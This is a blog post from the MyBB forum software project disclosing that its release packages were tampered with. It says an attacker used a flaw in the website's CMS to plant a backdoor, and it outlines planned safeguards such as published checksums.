A little over two weeks ago we announced the discovery of a rather significant vulnerability which may have effected some users. At the time there was a lot of uncertainty regarding the circumstances, but I feel it’s time to follow up on our original announcement with what has since come to hand. I hope this will answer any outstanding questions, ease some of the concern, and most importantly I hope everyone checks their installations to make sure they are not vulnerable.
First and foremost, I can confirm that the code was malicious and the release was modified on the server by a 3rd party. Therefore, it is crucial that you follow the instructions in the previous blog post to ensure your installation is not vulnerable. The release package was obviously cleaned as soon as the alarm was raised, so if you downloaded MyBB after the first blog post then you don’t need to worry. We aren’t sure exactly when the release packages were tampered with, however if you downloaded your package shortly after the release then you may not have been effected either.
There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.
In light of these events, we are looking at making several changes. At the very least we intend to publish checksums with downloads to help identify any future releases which may have been contaminated, we are also looking into automating the verification process using a remote server. Using a CDN to distribute our packages is another option being considered.
MyBB 1.6.5 should be released in the next few weeks but until then please be sure to follow the instructions in the first blog post to secure your board.